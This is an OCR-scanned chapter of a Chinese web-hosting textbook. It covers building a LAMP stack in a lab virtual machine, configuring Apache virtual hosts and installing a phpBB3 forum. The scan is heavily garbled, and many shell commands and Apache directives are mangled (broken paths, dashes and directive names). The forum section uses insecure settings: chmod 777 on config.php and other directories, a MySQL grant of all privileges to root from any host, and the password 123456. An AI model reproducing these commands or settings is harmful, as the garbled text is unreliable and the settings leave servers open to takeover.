与 数 年 才 更 新 一 次 的 ASP 相 比 ,PHP 的 更 新 速度 就 要 快 得 多 ,因为 PHP 每 几 周 就 
更 新 一 次 。 

6. 功能 丰富 

从 对 象 式 的 设计 、 结 构 化 的 特性 、 数 据 库 的 处 理 、 网 络 接 口 应 用 、 安 全 编码 机 制 等 ， 
PHP 几乎 涵盖 了 所 有 网 站 的 一 切 功 能 。 


7. 可 伸缩 性 强 

传统 上 网 页 的 交互 作用 是 通过 CGI 来 实现 的 。CGI 程序 的 伸缩 性 不 理想 ,因为 它 为 
每 一 个 正在 运行 的 CGI 程序 开 一 个 独立 进程 。 解 决 方法 就 是 将 经 常用 来 编写 CGI 程序 
语言 的 解释 器 编译 成 使 用 者 的 Web 服务 器 (如 mod_perlJSP) 。PHP 就 可 以 以 这 种 方式 
安装 ,虽然 很 少 有 人 愿意 这 样 以 CGI 方式 安装 它 。 内 嵌 的 PHP 可 以 具有 更 高 的 可 伸 
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53 搭建 LAMP 平台 


53.1 实验 环境 准备 


在 E:\Red Hat Enterprise Linux 5 虚拟 机 中 搭建 LAMP 平台 ,在 安装 服务 软件 之 前 
需 做 一 些 必要 的 准备 工作 。 

(1) 启动 本 机 VMware Network Adapter VMnetl 网 卡 ,以 host-only 联网 方式 启动 
E:\Red Hat Enterprise Linux 5 虚拟 机 。 

(2) 配置 虚拟 主机 IP 地 址 ,使 其 与 本 机 的 VMware Network Adapter VMnetl 网 卡 
位 于 同一 网 段 , 保 证 本 机 与 虚拟 机 是 连通 的 。 

| 选择 “系统 ”~ 管理 "一 网 络 ” 命 令 菜单 ,打开 “网 络 配置 "对话 框 。 

@ 选中 eth0 网 卡 ,进行 如 下 IP 地 址 编辑 ,如 图 5-2 所 示 。 


回 静态 设置 的 IP 地址 : 
| 插 工 设置 IP 地址 


地 址 @) : 192.168.253.1%0 
子 网 撞 码 (8) : 255255255d| 


默认 网 关 人 地址 : 


Da 站 


x Fe 而 确定 2) 


图 5-2 配置 JP 地址 


@ 激活 eth0 
@ 在 桌面 空白 处 右 击 , 打 开 命 令 终 端 ,执行 以 下 命令 ,重新 启动 网 络 服务 。 


# /etc/init. d/network restart 


(3) 进行 Linux 虚拟 主机 和 本 机 的 文件 夹 共享 设置 。 


@ 将 本 机 windows 操作 系统 下 的 f:\lamp 文件 夹 设 为 共享 文件 夹 ,具体 操作 步骤 见 
上 


@ 将 实验 所 用 的 4 个 软件 httpd-2. 2. 15. tar. gz、mysql-5. 1. 45-linux-i686-glibc23. 


tar. gz、php-5. 3. 2. tar. gz、.phpbb3. 0. 7_pll_zh_phpbbchina. zip 复制 到 本 机 f:\lamop 文件 
夹 内 。 


@ 在 Linux 虚拟 机 下 挂 载 windows 操作 系统 下 的 共享 文件 夹 , 具 体 命 令 见 1. 5. 2 节 。 
532 Linux 软 件 安装 方法 


Linux 操作 系统 中 软件 的 安装 主要 有 两 种 不 同 的 形式 。 第 一 种 安装 文件 名 为 
filename. tar. gz; 另 一 种 安装 文件 名 为 filename. i386. rpm。 以 第 一 种 方式 发 行 的 软件 多 
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为 以 源码 形式 ,第 二 种 方式 则 是 直接 以 二 进 制 形式 发 行 的 ,i386 即 表示 该 软件 是 按 Inter 
386 指令 集 编译 生成 的 。 


1. 源码 包 软 件 安装 方法 如 下 
1) 将 安装 文件 复制 至 特定 目录 
例如 ,如 果 是 以 root 身份 登录 上 的 ,就 将 软件 复制 至 /root 中 。 具 体 命 令 如 下 : 


# cp filename. tar. gz /root 


2) 解压 缩 
由 于 该 文件 是 被 压缩 并 打包 的 ,所 以 应 对 其 解压 缩 ,命令 为 : 


# tar xvzf filename. tar. gz 


执行 该 命令 后 ,安装 文件 按 路 径 , 解 压缩 在 当前 目录 下 。 用 ls 命令 可 以 看 到 解压 缩 
后 的 文件 。 通 常 在 解压 缩 后 产生 的 文件 中 ,有 名 为 INSTALL 的 文件 。 该 文件 为 纯 文本 
文件 ,详细 讲述 了 该 软件 包 的 安装 方法 。 对 于 多 数 需 要 编译 的 软件 ,其 安装 的 方法 大 体 
相同 。 

3) 配置 

执行 解压 缩 后 会 产生 的 一 个 名 为 configure 的 可 执行 脚本 程序 。 它 是 用 于 检查 系统 
是 否 有 编译 时 所 需 的 库 , 以 及 库 的 版 本 是 否 满足 编译 的 需要 等 安装 所 需要 的 系统 信息 为 
随后 的 编译 工作 做 准备 。 命 令 为 : 

#./configure 

如 果 检 查 过 程 中 ,发 现 有 错误 ,configure 将 给 予 提示 ,并 停止 检查 。 可 以 根据 提示 对 
系统 进行 配置 ,再 重新 执行 该 程序 。 

4) 编译 

配置 检查 通过 后 ,将 生成 用 于 编译 的 MakeFile 文件 。 此 时 ,可 以 开始 进行 编译 了 。 
编译 的 过 程 视 软件 的 规模 和 计算 机 的 性 能 的 不 同 , 所 耗费 的 时 间 也 不 同 。 命 令 为 : 

#make 

5) 安装 

成 功 编译 后 , 即 可 键入 如 下 的 命令 开始 安装 了 ,直至 安装 结束 。 


#make install 


2. rpm 软件 包 安 装 方法 
同 第 一 种 方式 一 样 ,将 安装 文件 复制 到 相应 的 目录 中 。 然 后 使 用 rpm 来 安装 该 文 
件 , 命 令 如 下 : 


# rpm- ivh filename. 1386. rpm 


rpm 命令 将 自动 将 安装 文件 解 包 ,并 将 软件 安装 到 默认 的 目录 下 ,将 软件 的 安装 信息 
注册 到 rpm 的 数据 库 中 ,其 中 i 表示 将 安装 指定 的 rmp 软件 包 ;v 表示 安装 时 显示 详细 信 
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息 ;h 表示 在 安装 期 间 出 现 “# ”符号 来 显示 目前 的 安装 过 程 。 
另外 ,还 有 一 些 Linux 平台 下 的 商业 软件 。 在 安装 文件 中 ,有 Setup 安装 程序 ,其 安 
装 方法 同 Windows 平台 下 的 一 样 ,如 Corel WordPerfect 等 。 


533 LAMP 平 台 构 建 


1. 安装 Apache 服务 器 

经 过 5.3.2 节 的 实验 准备 操作 ,在 Linux 虚拟 机 内 的 /windows 文件 夹 内 就 可 以 找到 
所 要 安装 的 软件 , 接 下 来 就 可 以 在 Linux 系统 下 安装 Apache、MySQL 和 PHP 三 个 软件 
了 。 由 于 在 安装 PHP 过 程 中 需要 指定 Apache 和 MySQL 的 安装 目录 ,因此 要 保证 PHP 
保留 到 最 后 进行 安装 。 

首先 可 以 先 安装 Apache 服务 器 ,其 对 应 的 软件 名 为 httpd-2. 2. 15. tar. gz, 具 体操 作 
命令 如 下 : 


#cp /windows/httpd- 22 15.tar.gz /usr/local/ 

#0d /usr/local 

#tar - zxvf httpd- 2.2 15.tar.gz 

#cd httpd- 2215 

#./configure —— prefix= /usr/local/apache — - sysconfdir= /etc/httpd — — enable- so 
# make && make install 

# /usr/local/apache/bin/apachect| start 


注意 ; 在 配置 命令 中 prefix 二 /usr/local/apache 表明 软件 的 安装 目录 为 /usr/local/ 
apache,sysconfdir 二 /etc/httpd 表明 软件 配置 文件 的 安装 目录 为 /etc/httpd。 

打开 浏览 器 ,输入 http://192. 168. 111. 128, 界 面 出 现 It works 即 安装 成 功 ,如 图 5-3 
所 示 。 


E DTC I 
」 文件 (编辑 (查看 (收藏 (和) 工具 (D) 帮助 () 局 
19Be -© -HAGIPa wx GE | 
| 瑞士 @)| 色 htpiiis2.163.iii29/ 。 下 四 和 i|| 久 


Tt works! 


太太 厂矿 三 属 ne 
图 5-3 Apache 安装 成 功 测试 界面 


2. 安装 MSQL 数据 库 服务 器 
Apache 安装 成 功 后 ,就 可 以 安装 MySQL 数据 库 服务 器 ,本 实验 所 操作 的 文件 是 免 
安装 版 本 的 ,只 需 在 Linux 系统 下 进行 解压 缩 操作 ,进行 一 些 数据 库 初始 化 操作 即 可 , 具 
体 命 令 如 下 : 
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# groupadd mysql 

# useradd — gmysql mysql 

# cp /windows/mysql. tar.gz /usr/local/ 
#cd /usr/local 

#tar - zxvf mysql.tar.gz 

#cd mysql 
#./scripts/mysql_ install_db — ~ user= mysql 
#./bin/mysqld_safe —— user=mysql & 
#./bin/mysql 


最 后 ,使 用 mysql 命令 来 登录 数据 库 ,显示 如 图 5-4 所 示 的 信息 ,表明 MySQL 数据 
安装 成 功 。 


FOotOIO ano sca ys 


文件 介 ”编辑 {E) 查看 (w) 终端 (D 标签 人 @) 帮助 中) 

[root@localhost mysql]# /usr/local/mysql/bin/mysql 加 
Welcome to the MySQL monitor. Commands end with ; or \g. 

Your MySQL connection id is 113 

Server version: 5.1.45 MySQL Community Server (GPL) 


Type“help;”or“\h” for help. Type“\c” to clear the current input statement. 


mysql> 


图 5-4 MySQL 数据 库 安装 成 功 测试 窗口 


3. 安装 PHP 应 用 服务 器 

Apache 和 MySQL 服务 器 都 正确 安装 完成 后 ,再 安装 PHP 应 用 服务 器 ,只 有 在 服务 
器 内 正确 的 安装 配置 该 应 用 服务 器 ,该 服务 器 才能 解析 执行 PHP 程序 ,其 安装 与 Apache 
安装 过 程 相似 ,只 是 具体 的 配置 参数 不 同 ,具体 安装 命令 如 下 : 

#cp /windows/php- 5.3.2 tar.gz /usr/local/ 

# cd /usr/local 

#tar -zxvf php- 5.3.2 tar.gz 

#cd php- 5.3.2 

#./configure —— prefix= /usr/local/php —— with- config- file- path= /usr/local/php/ 


etc —— with- apxs2= /usr/local/apache/bin/apxs -一 with- mysql= /usr/local/mysq| 
# make && make install 


# cp php. ini- development /usr/local/php/etc/php. ini 

注意 : 配置 命令 中 的 prefix 一 /usr/local/php 表明 PHP 的 安装 目录 为 /usr/local/ 
php; with-config-file-path 二 /usr/local/php/etc 表明 PHP 配置 文件 所 在 目录 为 /usr/ 
local/php/etc;with-apxs2 二 /usr/local/apache/bin/apxs 指定 使 用 apache 的 模块 编译 应 
用 程序 来 编译 php 模块 ;with-mysql 二 /usr/local/mysql 表明 mysql 的 数据 库 安装 目录 
为 /usr/local/mysql。 

4. LAMP 平台 整合 

安装 完 上 面 三 个 软件 后 ,还 要 修改 Web 服务 器 的 关键 配置 文件 ,使 得 Web 服务 器 在 
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接收 到 客户 端的 PHP 页 面 请 求 时 ,将 该 请 求 转 发 到 PHP 应 用 服务 器 进行 解释 执行 , 具 
体 过 程 配置 命令 如 下 : 

1) 修改 Apache 配置 文件 

Apache 配置 文件 为 httpd. conf, 由 于 前 面 安装 Apache 时 指定 了 配置 文件 目录 为 / 
etc/httpd; 所 以 可 到 /etc/httpd 文件 夹 下 找到 配置 文件 进行 如 下 编辑 : 

在 文件 中 找到 “AddType application/x-gzip. gz . tgz "字符 串 , 在 它 后 面 一 行 添加 
“AddType application/x-httpd-php .php”。 

该 字符 串 的 意思 是 添加 可 以 执行 php 的 文件 类 型 ,如 再 加 上 一 行 “AddType 
application/x-httpd-php. htm”, 表示 htm 文件 也 可 以 执行 php 程序 ;“ AddType 
application/x-httpd-php. txt”, 表 明 普 通 的 文本 文件 格式 也 能 运行 php 程序 。 

2) 重启 Apache 服务 

修改 完 Apache 配置 文件 后 ,必须 重新 Apache 服务 后 ,修改 后 的 配置 文件 才能 生效 ， 
命令 如 下 : 


# /usr/local/apache/bin/apachect| restart 


5. LAMP 平台 测试 

最 后 ,在 LAMP 平台 中 默认 网 站 目录 下 创建 一 个 PHP 文件 ,从 客户 端 访问 PHP 网 
页 ,测试 该 平台 是 否 正 常 工作 ,具体 操作 过 程 如 下 : 

1) 创建 PHP 文件 

Apache 的 默认 网 站 目录 为 /usr/local/apache/htdocs, 在 该 目录 下 可 使 用 vi 命令 创 
建 index. php 文件 ,输入 内 容 , 具 体 命令 为 : 


# cd /usr/local/apache/htdocs 

# vi index. php 

<?php phpinfo0; ?> 

2) 测试 

在 客户 端 打 开 浏 览 器 ,输入 http://192. 168. 111. 128/index. php, 显示 内 容 如 图 5-5 
所 示 ,表示 LAMP 平台 构建 成 功 。 


534 Apache 下 的 多 虚拟 主机 配置 


Apache 作为 目前 Internet 上 使 用 最 为 广泛 的 Web 服务 器 软件 ,通过 灵活 的 配置 , 同 
JIS 一样 可 以 实现 多 个 虚拟 主机 的 设置 。 本 节 在 LAMP 实验 平台 下 首先 创建 两 个 简单 的 
静态 网 站 及 日 志 目 录 , 再 通过 不 同方 法 发 布 这 两 个 网 站 。 

首先 ,创建 两 个 静态 网 页 ,命令 如 下 : 

mkdir Mebsite 

mkdir MebsiteMWebl 

mkdir MebsiteMWieb2 

echo “ww.baidu com' > /Website/Web1/index. html 

echo “wmw. sina. cam > /Website/Web2/index. html 
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PHP Version 5.3.2 


System Linux localhost.localdomain 2.6.18-53.el5 #1 SMP Wed Oct 10 16:34:02 EDT 
2007 i686 


Mar 15 2012 17:43:53 

“configure” ~prefix= /usrflocal/php’ ~with-config-flle-path=/usr/local/php/etc’ 
With-apxs2=jusrjlocalfapachejbin/apxs “~with-mysql= /usr/localjmysal" 
Apache 2.0 Handler 


图 5-5 LAMP 平 台 安装 成 功 测试 界面 


然后 ,为 两 个 网 站 创建 对 应 的 日 志文 件 ,命令 如 下 : 


mkdir Mebsite/Web1/log 

touch /Website/Web1/log/error_log 
touch /NWebsite/Web1/log/access_log 
mkdir Nebsite/Web2/log 

touch /NWebsite/Web2/log/error_log 
touch /MWebsite/Web2/ log/access_log 


1. 基于 不 同 P 地 址 
1) 为 服务 器 增加 IP 地 址 
为 服务 器 增加 网 卡 eth0 ,为 其 设 定 IP 地 址 为 192. 168. 111. 129, 具 体 命令 如 下 : 


# cp /etc/sysconfig/network- scripts/ifcfg- eth0 /etc/sysconfig/network— 
scripts/ifcfg— eth0:1 
# Vi /etc/sysconfig/network- scripts/ifcfg- eth0:1 


修改 原来 的 DEVICE 名 称 , 并 增加 IPADDR 信息 ,具体 内 容 如 下 : 


DEVICE= eth0:1 
1PADDR= 192. 168. 111. 129 


启动 网 络 , 命 令 如 下 : 


# service network restart 
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2) 在 主 配 文件 httpd. conf 文件 中 引入 虚拟 主机 配置 文件 ,具体 命令 如 下 : 
# vi {path} /httpd. conf 
将 原来 的 
# Include /etc/httpd/extra/httpd- vhosts. conf 
指令 中 的 注释 符 去 掉 , 即 
Include /etc/httpd/extra/httpd- vhosts. conf 


3) 在 httpd-vhost. conf 中 配置 虚拟 主机 
首先 将 原 有 内 容 前 面 加 “ # ”注释 。 
增加 以 下 配置 信息 : 


< VirtualHost 192 168. 111. 128:80> 
DocumentRoot “/Website/Web1” 
ServerName “Ww.testl.com” 
Errorlog “ /Websibe/Web1/log/error_ log” 
Qustonl og “ /Nebsibe/Web1/log/access_ log” comon 
《Directory “/NWebsite/Web1’> 
Options Indexes Fol lowSynLinks 
AllowOverride None 
Order allow, deny 
Allow from all 
< /Directory> 
< NirtualHost> 
< VirtualHost 192 168. 111. 129:80> 
DocumentRoot “/Website/Web2” 
ServerName “Ww.test2 com 
Errorlog “ /Nebsibe/Web2/log/error_ log” 
CustomLog “Nebsibe/Web2/1log/access_ log” common 
<Directory “MebsiteWeb2> 
Options Indexes Fol lowSynlinks 
AllowOverr ide None 
Order allow, deny 
Allow from all 
< /Directory> 
< NirtualHost> 


最 后 ,重启 Apache 服务 器 ,通过 http://192. 168. 111. 128 地 址 访问 网 页 内 容 可 见 
www. baidu. com; 通 过 http://192. 168. 111. 129 地 址 访问 网 页 内 容 可 见 www. sina. com。 


2. 基于 不 同 TCP 端口 
1) 增加 监听 端口 
操作 命令 如 下 : 
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改 为 


Listen 80 
Listen 8080 


以 上 设置 的 含义 为 同时 监听 80 与 8080 端口 。 
2) 在 主 配 文件 httpd. conf 文件 中 引入 虚拟 主机 配置 文件 


# vi fpath} /httpd. conf 

将 原来 的 

# Include /etc/httpd/extra/httpd- vhosts. conf 
中 的 注释 符 去 掉 , 即 

Include /etc/httpd/extra/httpd- vhosts. conf 


3) 编辑 配置 httpd-vhost. conf 文件 
首先 将 原 有 内 容 前 面 加 “ # ”注释 。 
增加 以 下 配置 信息 : 


< VirtualHost 192 168. 111. 128:80> 
DocumentRoot “/Website/Web1” 
ServerName “www testl.com 
Errorlog “ /Nebsibe/Web1/log/error_ log” 
QustonLog “ /Nebsibe/Web1/1og/access_ log” common 
<Directory “MebsiteMWeb1> 
Options Indexes Fol lowSynLinks 
AllowOverride None 
Order allow, deny 
Allow from all 
< /Directory> 
< NirtualHost> 
< VirtualHost 192 168. 111. 128:8080> 
DocumentRoot “/\Website/Web2” 
ServerName “Wm.test2.com” 
Errorlog “/MNebsibe/Web2/log/error_ log” 
Qustorlog 。 “人 Websibe/Web2/log/access_log ”common 
《Directory “WebsiteMWeb2> 
Options Indexes Fol lowSynl inks 
AllowOverride None 
Order allow, deny 
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Allow from all 
< /Directory> 
< NirtualHost> 


最 后 ,重启 Apacha 服务 器 ,通过 http://192. 168. 111. 128 地 址 访问 网 页 内 容 可 见 
www. baidu. com; 通 过 http://192. 168. 111. 129:8080 地 址 访问 网 页 内 容 可 见 www. 


sina. com 。 


3. 基于 不 同 主机 头 
1) 在 主 配 文 件 httpd. conf 文件 中 引入 虚拟 主机 配置 文件 


# Vi {path}/httpd. conf 

将 原来 的 

# Include /etc/httpd/extra/httpd- vhosts. conf 
中 的 注释 符 去 掉 , 即 

Include /etc/httpd/extra/httpd- vhosts. conf 


2) 编辑 配置 httpd-vhost. conf 文件 
将 原 有 内 容 前 面 加 # 注 释 , 增 加 以 下 配置 信息 : 


NameVirtualHost * :80 
“VirtualHost * :80> 
DocumentRoot “/Website/Web1” 
ServerName “ww.testl1.com” 
Errorlog “Nebsibe/Web1/log/error_ log” 
QustonlL og “/Nebsibe/Web1/log/access_log” common 
《Directory “MebsiteWeb2 > 
Options Indexes Fol lowSynLinks 
AllowOverride None 
Order allow, deny 
Allow from all 
< /Directory> 
< NirtualHost> 
< VirtualHost * :80> 
DocumentRoot “/\Website/Web2” 
ServerName “Wm.test2. com 
Errorlog “Websibe 人 Web2/Iog/error_log” 
CustomLog “Nebsibe/Web2/ log/access_log” comon 
《Directory “/Website/NWeb2’> 
Options Indexes Fol lowSynLinks 
AllowOverride None 
Order allow, deny 


Allow from all 
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< /Directory> 
< NirtualHost> 
3) 设置 主机 头 与 IP 地 址 对 应 关系 
通常 在 域名 解析 服务 器 内 增加 两 条 解析 关系 如 下 : 


192 168. 111. 128 ww. test1. com 

192 168. 111. 128 ww. test2 com 

受 实验 环境 所 限 ,未 搭建 DNS 服务 器 ,也 可 修改 客户 端 机 器 的 hosts 文件 ,增加 IP 
地 址 与 域名 的 对 应 关键 ,进行 测试 。 最 后 ,重启 Apacha 服务 器 ,通过 http://www. testl. 
com 地 址 访问 网 页 内 容 可 见 www. baidu. com; 通 过 http://www. test2. com 地 址 访问 网 
页 内 容 可 见 www. sina. com。 


”5.4 ”LAMP 平台 下 发 布 PHP 网 站 


LAMP 平台 下 的 PHP 网 站 发 布 过 程 同 Windows 平台 下 ASP 网 站 发 布 类 似 ,也 遵 
循 以 下 三 个 步骤 : 

Q@ 发 布 网 站 文件 ,让 用 户 通过 客户 端 能 够 远程 访问 该 网 站 内 的 网 页 文件 , 若 该 动态 
网 页 文件 涉及 数据 库 操作 , 则 需要 完成 后 面 两 步 操作 后 ,才能 够 被 远程 访问 。 

@ 构建 后 台数 据 库 ,包括 数据 库 结 构 .数据 表 结 构 、 视 图 .存储 过 程 及 一 些 网 站 的 初 
始 化 数据 等 。 只 有 正确 地 创建 数据 库 ,才能 保证 网 站 系统 的 正常 运行 。 

@ 修改 网 站 连接 配置 文件 ,设置 正确 的 数据 库 连接 参数 ,保证 前 台 网 站 文件 能 够 正 
常 连接 后 台数 据 库 。 该 文件 有 可 能 是 文本 文件 .也 可 能 是 包含 在 php 文件 中 。 

【 实 训 5-1】 在 5.3 节 所 搭建 的 LAMP 平台 基础 上 发 布 phpbb3 开源 论坛 ,其 源码 文 
件 为 phpbb3. 0.7_pll_zh_phpbbchina. zip ,位 于 客户 机 Windows 操作 系统 下 d:\lamp 文 
件 夹 内 ,Linux 虚拟 机 IP 地 址 为 192. 168. 111. 128 。 


1. 准备 网 站 源码 文件 

(1) 将 本 机 d:\lamp 文件 夹 共 享 , 并 在 Linux 系统 下 将 其 挂 载 到 “/windows” 文 件 
夹 ,详细 操作 命令 见 1. 5.2 节 。 

(2) 将 网 站 源码 文件 拷贝 到 指定 文件 夹 , 并 将 其 解压 缩 , 操 作 命 令 如 下 : 

# cp /windows/phpbb3.0.7_zh_phpbbchina.zip /usr/local/apache 

# cd /usr/local/apache 

# jar - xvf phpbb3.0.7 zh_phpbbchina. zip 

#mv phpbb3. 0.7_zh_phpbbchina phpbb3 

通过 以 上 命令 将 网 站 源码 文件 复制 到 主机 上 的 /usr/local/apache/phpbb3 文件 夹 
内 ,完成 发 布 准 备 工作 。 


2. 发布 网 站 源码 文件 
在 Apache 服务 器 中 发 布 PHP 网 站 主要 是 对 Apache 配置 文件 httpd. conf 进行 编 
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辑 , 具 体 方法 如 下 : 

(1) 打开 /etc/httpd/httpd. conf 文件 ,找到 “httpd-vhost. conf” 字 符 串 ,将 其 前 面 的 
“并 ” 去 掉 。 

(2) 在 httpd-vhost. conf 配置 文件 中 引入 如 下 内 容 : 


<VirtualHost 192 168.111.128:80> 
DocumentRoot “/usr/local/apache/phpbb3” 
Directorylndex index.php 
< Directory “/usr/localMapache/phpbb3 > 
Options Indexes Fol lowSynLinks 
AllowOverride None 
Order allow, deny 
Allow from all 
< /Directory> 
< NirtualHost> 
其 中 ,二 VirtualHost 192. 168. 111. 128 ;80 之 表明 网 站 的 IP 地 址 为 192. 168. 111. 
128 ,端口 为 80; DocumentRoot 属性 值 为 主 目录 , 即 网 站 源码 所 在 目录 为 /usr/local/ 
apache/phpbb3;DirectoryIndex 属性 值 为 默认 文档 , 即 网 站 默认 访问 文档 为 index. php; 
所 Directory 二 标签 内 指令 是 对 主 目录 /usr/local/apache/phpbb3 进行 的 权限 设置 。 
(3) 重启 Apache 服务 器 。 
修改 配置 文件 后 ,必须 重新 启动 Apache 服务 器 ,使 之 生效 ,命令 如 下 : 


# /usr/local/apache/bin/apachect| restart 


3. 访问 网 站 安装 向 导 , 根 据 提示 完成 后 续 安装 操作 

经 过 前 两 步 的 操作 ,已 经 完成 了 前 台 网 站 的 发 布 ,就 可 以 在 客户 端 启动 浏览 器 ,输入 
http://192.168. 111. 128 访问 网 站 安装 向 导 , 如 图 5-6 所 示 。 根 据 向 导 提 示 信 息 来 完成 
创建 数据 库 . 导 入 初始 数据 及 修改 配置 文件 等 操作 。 


光 寺 机 
iE re [| 


承印 二 村 | 
借用 天 项 未 可 以 在 的 各 攻 上 实 条 php55. 
为 了 给 迪 区 ， 空 人 要 如 证 号 有 杀人 库 设 于 .各 雪 不 肖 相 这 ， 南 姑 缠 信 拉 wsb 则 扫 拱 香 , 没有 这 此 全 实 半 并 不 对 对 器 要 


pr 
图 5-6 ”phpBB 网 站 安装 向 导 首 页 
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1) 检测 需求 

首先 要 进行 服务 器 兼容 性 检测 ,在 完整 安装 之 前 ,phpBB 对 服务 器 设置 及 所 需 文件 
进行 检测 ,包括 PHP 版 本 及 设置 .可 用 的 数据 库 .必须 的 文件 及 目录 等 内 容 , 以 确定 服务 
器 是 否 可 以 安装 和 运行 phpBB。 只 要 所 有 必需 的 检测 都 通过 ,才能 进行 “下 一 步 ? 安 装 操 
作 。 默 认 情 况 下 ,在 首次 检测 时 ,在 网 页 上 会 显示 一 些 目录 的 状态 是 “存在 ,不 可 写 ”, 如 
图 5-7 所 示 。 

一 文件 与 目录 


必需 的 - 为 了 正常 运行 ，phpBB 需 要 针对 特定 文件 或 目录 的 写 入 权限 。 如 果 下 面 出 现 “ 不 存在 ”， 念 就 需要 创建 相应 的 文件 或 目录 ; 如 果 出 现 “ 不 可 写 入 ”， 您 就 需要 
改变 相应 的 文件 或 目录 的 权限 来 允许 phpBB 对 其 进行 写 入 操作 。 


cache/: 在 在 , 不 可 写 
flles/ 存在 , 不 可 写 
store/: 存在 , 不 可 写 
可 选 的 文件 与 目录 
可 选 的 - 这 些 文件 、 目 录 及 权限 不 是 必需 的 。 如 果 它 们 不 存在 或 不 可 写 入 ， 安 装 程序 将 会 尝试 使 用 一 些 技术 手段 来 创建 它们 。 但 如 果 存 在 ， 将 会 使 安装 加速 。 
config.php 存在 , 不 可 写 
images/avatars/upload/; 存在 , 不 可 写 
“ 重 声 检测 一 | 


图 5-7 ”服务 器 兼容 性 检测 页 面 


在 服务 器 内 ,应 根据 安装 向 导 提示 信息 增加 相应 文件 夹 的 “ 写 和 人 ”权限 ,具体 操作 命令 
如 下 : 


# cd /usr/local/apache/phpbb3 
# chmod 777 . /files 

# chmod 777 . /store 

# chmod 777 . /cache 

# chmod 777 . /config. php 


完成 以 上 操作 后 ,在 安装 向 导 页 面 选择 “重新 检测 ”, 刷 新 后 就 会 显示 “开始 安装 ”, 表 
明 已 经 完成 了 服务 器 兼容 性 检测 。 

2) 创建 后 台数 据 库 

开始 安装 后 ,系统 首先 要 求 输入 数据 库 服 务 地 址 及 名 称 等 信息 ,就 需要 在 数据 库 服务 
器 内 创建 网 站 所 使 用 的 数据 库 , 具 体操 作 命令 如 下 : 

# /usr/local/mysql/bin/mysql —u root-p 

mysql> create database myphpbb:; 

mysql> show databases; 

mysql> grant all privileges on *.* to root@”%” with grant option; 

mysql> exit 

然后 在 “安装 向 导 ” 页 面 内 写 入 正确 的 数据 库 信息 ,如 图 5-8 所 示 。 单 击 “ 继 续 进 行 下 
一 步 ?按钮 ,弹出 “连接 成 功 ” 信 息 ,表明 前 台 网 站 系统 可 以 正常 连接 到 后 台数 据 库 , 则 可 以 
继续 下 一 步 安装 。 

3) 管理 员 信息 设置 

接 下 来 ,安装 向 导 要 求 设 置 网 站 系统 的 管理 员 信息 ,按照 要 求 输入 相关 信息 ,通过 检 
测 , 如 图 5-9、 图 5-10 所 示 ,进行 下 一 步 安 装 操作 。 

153 


网 站 构建 分 析 mmm 


数 舌 库 设 置 
数 括 库 类 型 : wsat 司 
数 舌 库 服务 加 地 址 ,或 DSN: |192.168.111.128 
DSN 从 站 秋 粳 合生 ， 上 只 与 DDBC 苔 天 - 
数 掺 库 服务 器 芝 口 : 
大 要 才 是 ， 屏 六 多 大 局 报 务 如 局 钙 一 个 间 环 生 闻 口 - 
数 舌 库 名 称 : myphpbb 
到 又 库 用 户 名 : root 
数 舌 库 密码 : 
为 数 括 库 中 的 表 阁 名 称 添加 前 缀 : phpbb3_ 
继续 进行 下 一步 
数 掺 库 连 按 
连接 检测 连接 成 功 
人 续 进 行 下 一 步 


默认 论坛 语言: [和文 “ 司 
管理 员 用 户 和 名: admin 
天 时 人 一 个 3 0 世 愉 民 户 用 
节理 RE 
研 革 人 一 76 了 0 人 内 击 可 . 
确认 管理 员 审 码 : ee 
email 联 络 地 址 : aa@126.com 
确认 Email 诺 笑 地 址 ; aag@l126.com 
图 5-9 管理 员 信息 设置 页 面 
管理 前 信息 
检测 各 理 届 设 置 ; 检测 通过 
人 续 进行 下 一 步 
图 5-10 检测 管理 员 设置 页 面 
4) 配置 文件 


安装 向 导 将 会 检测 config. php 是 否 可 写 , 若 可 写 , 则 自动 将 数据 库 连接 信息 写 入 配 
置 文件 config. php 中 ,并 显示 如 图 5-11 所 示 的 信息 。 


写 入 配置 文件 成 功 ， 您 现在 可 以 继续 进行 下 一 步 。 


图 5-11 写 入 配置 文件 成 功 页 面 


否则 ,进入 到 网 站 主 目录 /usr/local/apache/phpbb3 文件 夹 下 打开 config. php 文件 ， 
然后 设置 数据 库 连接 参数 内 容 如 图 5-12 所 示 ,包括 数据 库 类 型 为 mysql、 数 据 库 IP 地 址 
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为 192.168. 111. 128 ,数据库 名 称 my phpbb 数据库 用 户 名 root .数据库 密码 123456 等 。 


<?php 

// phpBB 3.0.x auto-generated configuration file 
// Do not change anything in this file! 

$dbms = ‘mysql'; 


$dbhost =“192.168.111.128 '; 
$dbport = ""; 

$dbname = ‘myphpbb’; 
$dbuser = ‘root’; 


$dbpasswd = '123456'; 
$table prefix = 'phpbb_'; 
$acm type = 'file'; 
$load extensions = "'; 


@define('PHPBB_INSTALLED', true); 
// @define('DEBUG', true); 

// edefine( ‘DEBUG EXTRA', true); 
2 


图 5-12 ”config. php 配置 文件 内 容 


5) 高 级 设置 

接 下 来 设 定 E-mail 和 服务 器 URL, 由 于 这 些 参数 可 在 管理 员 控 制 面板 中 随时 更 改 ， 
因此 在 安装 过 程 中 可 不 做 任何 设置 ,采用 默认 值 ,直接 单 击 * 继 续 进 行 下 一 步 ? 按 钮 。 

6) 创建 数据 表 

在 该 步骤 中 ,安装 向 导 在 后 台数 据 库 myphpbb 内 自动 创建 网 站 所 需 的 数据 库 表 及 初 
始 数据 ,显示 操作 成 功 提示 信息 如 图 5-13 所 示 , 单 击 “ 继 续 进 行 下 一 步 ” 按 钮 。 


phpBB 3.0 所 使 用 的 数据 库 表格 已 经 被 创建 并 被 填 入 一 些 初始 数据 ， 请 继续 至 下 一 步 以 完成 安装 。 
克 革 进行 下 一 步 


图 5-13 创建 数据 库 成 功 界面 


7) 完成 
最 后 ,显示 安装 成 功 提示 信息 如 图 5-14 所 示 , 并 提示 在 访问 论坛 网 站 前 删除 网 站 源 
码 目 录 下 的 install 文件 夹 , 进 入 网 站 服务 器 内 ,删除 install 文件 夹 命令 如 下 : 


# cd /usr/local/apache/phpbb3 
#rm-—rf install 


基本! 
您 已 经 成 功 安装 phpBB 3.0.7, 从 这 里 , 您 可 以 通过 以 下 选项 设置 您 的 phpBB3; 


转换 一 个 已 经 存在 的 论坛 到 php883 
PhpBB 统一 转换 框架 支持 从 phpBB 2.0.x 和 其 他 论坛 软件 到 phpBB3 的 转换 . 如 果 您 有 一 个 旧 的 论坛 需要 转 亦 , 请 运行 转 热 程序 . 


使 用 您 的 phpBB3! 
